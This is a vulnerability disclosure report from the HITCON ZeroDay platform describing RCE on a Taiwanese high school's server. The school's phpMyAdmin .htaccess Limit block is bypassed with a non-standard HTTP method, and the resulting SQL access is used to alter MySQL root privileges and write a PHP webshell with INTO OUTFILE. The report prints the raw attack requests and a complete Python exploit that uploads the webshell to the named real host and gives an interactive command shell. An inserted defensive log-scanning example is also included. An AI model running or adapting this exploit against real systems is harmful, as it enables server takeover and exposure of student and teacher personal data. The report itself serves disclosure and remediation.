Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2021-00213
- Vendor: TACERT (台灣學術網路危機處理中心, Taiwan Academic Network Computer Emergency Response Team)
- Title: National Ilan Senior High School (國立宜蘭高級中學): SQL injection leading to RCE
- Introduction: a phpMyAdmin permission problem allows arbitrary SQL to be run, which in turn leads to RCE
Handling status
- Current status: Public
- Last Update: 2021/05/01
- Workflow stages: New submission, Reviewed, Reported, Patched, Retested, Public
Handling history
- 2021/04/21 21:34:47 : New submission (status updated by entroy)
- 2021/04/21 23:12:21 : Review completed (status updated by the HITCON ZeroDay service team)
- 2021/04/23 13:58:51 : Patch in progress (status updated by the HITCON ZeroDay service team)
- 2021/04/27 11:21:40 : Retest requested (status updated by the HITCON ZeroDay service team)
- 2021/04/27 11:35:29 : Confirmed patched (status updated by entroy)
- 2021/05/01 03:00:05 : Public (updated automatically by the HITCON ZeroDay platform)
Details
- ZDID: ZD-2021-00213
- Reporter: entroy (entroy)
- Risk: High
- Type: Remote Code Execution
References
An attacker can use this vulnerability to take full control of the host, write arbitrary files, and obtain a large amount of internal network information.
Vulnerability description: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
Vulnerability description: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
Vulnerability description: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
Vulnerability description: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(This field is generated automatically by the system from the vulnerability category, as reference material.)
Related URL
http://xms.ylsh.ilc.edu.tw/
Description
phpMyAdmin is protected with an .htaccess file.
Any HTTP method other than those listed in the Limit block bypasses it; the method I used was GETS.
.htaccess
AuthName PhpMyAdmin
AuthType Basic
AuthUserFile "C:/XMS/www/phpMyAdmin/.htpasswd"
<Limit GET PUT POST>
require user sysop
</Limit>
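The bypass above works because Apache applies a Require directive placed inside a Limit block only to the methods that block lists (plus HEAD, which Apache folds into GET), so a request carrying any other method token reaches phpMyAdmin without authentication. The fix is to put the Require directive outside any Limit block so it covers every method. The following Python is an added example and is not code from this report, from phpMyAdmin, or from Apache: it parses a constructed weak .htaccess modelled on the one above together with its hardened counterpart, reports which methods the authentication actually covers, and scans constructed Apache combined-log lines for requests to the protected path that would have skipped authentication. The .htpasswd path, log lines, addresses and user agents are all made up.

```python
import re

# Constructed .htaccess samples (not the site's real file). The weak variant wraps
# the authentication requirement in <Limit>, so it applies only to the listed methods.
WEAK_HTACCESS = """AuthName PhpMyAdmin
AuthType Basic
AuthUserFile "/path/to/.htpasswd"
<Limit GET PUT POST>
require user sysop
</Limit>
"""

# The hardened variant applies Require unconditionally, to every HTTP method.
HARDENED_HTACCESS = """AuthName PhpMyAdmin
AuthType Basic
AuthUserFile "/path/to/.htpasswd"
Require user sysop
"""

# Directives that grant or deny access; inside <Limit> they cover only the listed methods.
ACCESS_DIRECTIVES = ("require", "order", "allow", "deny", "satisfy")
LIMIT_RE = re.compile(r"<Limit\s+([^>]+)>(.*?)</Limit>", re.IGNORECASE | re.DOTALL)


def _access_lines(text):
    return [ln.strip() for ln in text.splitlines()
            if ln.strip().lower().startswith(ACCESS_DIRECTIVES)]


def find_limited_auth(htaccess):
    """Return (methods, directive) pairs for access directives wrapped in <Limit>."""
    findings = []
    for m in LIMIT_RE.finditer(htaccess):
        methods = set(m.group(1).upper().split())
        if "GET" in methods:
            methods.add("HEAD")  # Apache treats a GET limit as covering HEAD as well
        for directive in _access_lines(m.group(2)):
            findings.append((sorted(methods), directive))
    return findings


def request_bypasses_auth(method, htaccess):
    """True if a request with this method is not subject to any access directive."""
    # Directives outside every <Limit> block apply to all methods: nothing to bypass.
    if _access_lines(LIMIT_RE.sub("", htaccess)):
        return False
    limited = find_limited_auth(htaccess)
    if not limited:
        return False  # no access control configured at all; a different finding
    return all(method.upper() not in methods for methods, _ in limited)


# Constructed Apache combined-log lines using RFC 5737 test addresses.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Apr/2021:21:29:50 +0800] "GET /phpmyadmin/index.php HTTP/1.1" 401 381 "-" "curl/7.68.0"',
    '203.0.113.5 - - [21/Apr/2021:21:30:01 +0800] "GETS /phpmyadmin/sql.php?db=mysql HTTP/1.1" 200 5123 "-" "curl/7.68.0"',
    '198.51.100.7 - sysop [21/Apr/2021:21:31:10 +0800] "POST /phpmyadmin/sql.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - sysop [21/Apr/2021:21:31:12 +0800] "HEAD /phpmyadmin/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [21/Apr/2021:21:32:00 +0800] "GET /xms/index.php HTTP/1.1" 200 900 "-" "curl/7.68.0"',
]

LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def flag_bypass_requests(log_lines, protected_prefix, htaccess):
    """Requests under the protected path whose method is outside the <Limit>-scoped auth."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _user, _ts, method, path, status = m.groups()
        if (path.lower().startswith(protected_prefix)
                and status != "401"
                and request_bypasses_auth(method, htaccess)):
            hits.append((ip, method, path, int(status)))
    return hits


if __name__ == "__main__":
    for methods, directive in find_limited_auth(WEAK_HTACCESS):
        print("auth limited to", methods, "->", directive)
    for hit in flag_bypass_requests(SAMPLE_LOG, "/phpmyadmin/", WEAK_HTACCESS):
        print("possible Limit bypass:", hit)
```

Run against the weak file, the scanner reports only the request whose method is outside the Limit list and that still received a 200; the HEAD request is not flagged because Apache already covers it under GET. Against the hardened file nothing is flagged, since the Require directive applies to every method. In production the same check can be run over the real access log with the real .htaccess to confirm that no unauthenticated request reached phpMyAdmin.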
I then found that privilege management had not been done properly, so the session ran directly with root@localhost privileges.
Running the following directly:
select "<?php phpinfo();?>" INTO OUTFILE "c:\\路徑\\shell.php"
showed there was no permission to write the file, with this message:
Access denied for user 'root'@'localhost'
Following https://stackoverflow.com/questions/17975120/access-denied-for-user-rootlocalhost-using-password-yes-no-privileges
I found that the root user was missing authentication_string, so I added the column and the data directly; I sent the requests with Burp.
Add the column:
GETS /phpmyadmin/sql.php?lang=utf-8&convcharset=iso-8859-1&server=1&db=mysql&sql_query=ALTER+TABLE+user+add+COLUMN+authentication_string+VARCHAR(15)
&goto=main.php HTTP/1.1
Host: xms.ylsh.ilc.edu.tw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=916d8b77d4260195ae71358a792f6829
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 0
Write the data:
UPDATE user SET authentication_string=password('password') WHERE user='root'
Reload the privileges:
FLUSH PRIVILEGES;
After that, writing the file succeeded:
GETS /phpmyadmin/sql.php?lang=utf-8&convcharset=iso-8859-1&server=1&db=mysql&sql_query=select+%22%3C%3Fphp%20if%28isset%28%24_POST%5B%27cmd%27%5D%29%29%20%7Bsystem%28%24_POST%5B%27cmd%27%5D%29%3B%7D%20%3F%3E%22%20INTO%20OUTFILE%20%22c%3A%5C%5CXMS%5C%5Cwww%5C%5Cxms%5C%5C4eff2c041976ea22afb7092a53188c70.php%22
&goto=main.php HTTP/1.1
Host: xms.ylsh.ilc.edu.tw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=916d8b77d4260195ae71358a792f6829
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 0
Full Python script:
import requests
import subprocess
import time
import hashlib
import sys
import os

def getCommandResult(command):
    # run a shell command; output is discarded
    p = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, close_fds=True)
    _, _ = p.communicate()

def get_filename():
    # md5 of the current time, used as a random file name
    m = hashlib.md5()
    data = str(time.time())
    m.update(data.encode('utf-8'))
    h = m.hexdigest()
    return str(h)

def upload_webshell():
    filename = get_filename()
    getCommandResult('''curl -X GETS 'http://xms.ylsh.ilc.edu.tw/phpmyadmin/sql.php/?lang=utf-8&convcharset=iso-8859-1&server=1&db=mysql&sql_query=select+%22%3C%3Fphp%20if%28isset%28%24_POST%5B%27cmd%27%5D%29%29%20%7Bsystem%28%24_POST%5B%27cmd%27%5D%29%3B%7D%20%3F%3E%22%20INTO%20OUTFILE%20%22c%3A%5C%5CXMS%5C%5Cwww%5C%5Cxms%5C%5C{}.php%22' -v'''.format(filename))
    time.sleep(1)
    # check that the written file is reachable over HTTP
    if requests.get('http://xms.ylsh.ilc.edu.tw/xms/{}.php'.format(filename)).status_code != 200:
        return False
    return filename

def webshell(filename):
    print('q or ctrl^c to quit')
    print('=========================== webshell ===========================')
    url = 'http://xms.ylsh.ilc.edu.tw/xms/{}.php'.format(filename)
    while True:
        cmd = input()
        if cmd == 'q':
            break
        data = {
            'cmd': cmd
        }
        result = requests.post(url, data=data)
        result.encoding = 'big5'
        print(result.text)

def del_webshell(filename):
    # clean up the uploaded file
    print('deleting webshell ... ')
    url = 'http://xms.ylsh.ilc.edu.tw/xms/{}.php'.format(filename)
    cmd = 'del {}.php /f'.format(filename)
    data = {
        'cmd': cmd
    }
    requests.post(url, data=data)

def main():
    print('Uploading webshell ... ')
    filename = upload_webshell()
    try:
        if (not filename):
            print('Upload webshell failed ... ')
            exit()
        webshell(filename)
        del_webshell(filename)
    except KeyboardInterrupt:
        print('Interrupted')
        try:
            del_webshell(filename)
        except SystemExit:
            os._exit(0)

if __name__ == "__main__":
    main()
Once inside, I found personal data of students and teachers as well as grade-related records.
Screenshots